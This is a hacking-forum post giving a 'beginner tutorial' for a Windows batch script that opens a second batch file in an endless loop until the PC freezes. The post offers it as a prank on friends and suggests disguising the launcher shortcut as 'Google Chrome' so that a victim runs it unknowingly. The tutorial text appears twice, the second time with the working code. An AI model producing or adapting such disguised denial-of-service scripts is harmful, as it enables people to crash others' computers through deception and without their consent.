OP 26 March, 2021 - 03:16 AM
(This post was last modified: 26 March, 2021 - 03:17 AM by Uninterupted.)
Beginner tutorial on a code that I created with knowledge I have with batch coding.
Basically its a code that keeps opening a .bat file and it doesn't stop. (Your PC freezes). You can use this to mess around with your friends.
Its made our of 2 files both being .bat files.
First file:
(edit the <text> to your needs)
Second file:
(You must edit the path to echo.bat)
*Optional*
You can add a shortcut to the run.bat file and changing the icon and the name to like "Google Chrome"
All you need to do is run the second file named run.bat in my equation. I mean don't run it if you don't want your PC tp freeze...
You can modify the code to your needs of course this is just an idea.
Like the title says its a Beginner tutorial!
I hope i helped you beginners out there!
Basically its a code that keeps opening a .bat file and it doesn't stop. (Your PC freezes). You can use this to mess around with your friends.
Its made our of 2 files both being .bat files.
First file:
(edit the <text> to your needs)
Code:
@echo off
color A
echo <text>
pause
Second file:
(You must edit the path to echo.bat)
Code:
:menu
start "" "C:\Users\Exsample\Desktop\echo.bat"
goto menu
*Optional*
You can add a shortcut to the run.bat file and changing the icon and the name to like "Google Chrome"
All you need to do is run the second file named run.bat in my equation. I mean don't run it if you don't want your PC tp freeze...
You can modify the code to your needs of course this is just an idea.
Like the title says its a Beginner tutorial!
I hope i helped you beginners out there!